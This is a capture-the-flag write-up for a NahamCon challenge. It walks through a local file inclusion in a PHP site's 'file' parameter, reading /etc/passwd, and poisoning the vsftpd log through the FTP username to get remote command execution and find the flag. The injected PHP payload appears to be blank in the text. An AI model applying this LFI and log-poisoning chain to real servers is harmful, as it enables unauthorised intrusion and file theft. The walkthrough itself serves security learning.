Tags: rce lfi log_poisoning
Rating:
We have two links in task – [website of logging service](http://challenge.nahamcon.com:31042) and [ftp_server](http://challenge.nahamcon.com:30199). We can guess that it is ftp server, because of "FTP can be used to access raw files if needed" in logging service description, or by connecting via netcat:
```
~ nc challenge.nahamcon.com 30199
220 Welcome to FTP Server
```
But unfortunately we can't get access to FTP because we don't know username and password:
```
~ ftp challenge.nahamcon.com 30199
Connected to challenge.nahamcon.com.
220 Welcome to FTP Server
Name (challenge.nahamcon.com:dizvyagintsev): idontknowusername
331 Please specify the password.
Password: idontknowpassword
530 Login incorrect.
ftp: Login failed.
```
Let's examine site a bit more, button "Learn more about our pricing" send us to http://challenge.nahamcon.com:31042/index.php?file=pricing. We can see that filename sends as GET param, so we can try local file enclusion.
![LFI](https://i.ibb.co/3N4bKKq/2021-03-16-14-07-57.png)
But we don't know in which file flag is, so we should find a way to execute remote code on server. I tried some ways from this [cheat sheet ](https://highon.coffee/blog/lfi-cheat-sheet/), but nothing worked.
From /etc/passwd we can find out that logging service use apache as webserver and vsftpd as FTP server:
```
apache:x:100:101:apache:/var/www:/sbin/nologin
vsftp:x:101:21:vsftp:/var/lib/ftp:/sbin/nologin
```
We can control content of their logs, so if we can open apache or vsfpd logs we can inject php code on site and execute remote code. We can't open apache logs `/var/log/apache2/access.log` but `/var/log/vsftpd.log` works.
![vsftpd logs](https://i.ibb.co/NSXmbxn/2021-03-16-14-39-21.png)
We can see that vsftpd logs username, so if it will be valid php code in ``, so we can execute bash command from cmd GET param.
```
ftp challenge.nahamcon.com 30199
Connected to challenge.nahamcon.com.
220 Welcome to FTP Server
Name (challenge.nahamcon.com:dizvyagintsev):
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed.
```
Let's use `find / -name 'flag.txt' | xargs cat` command that will recursively search for flag.txt file, starting from root directory and cat its content.
![flag](https://i.ibb.co/CmTrwLn/2021-03-16-14-56-49.png)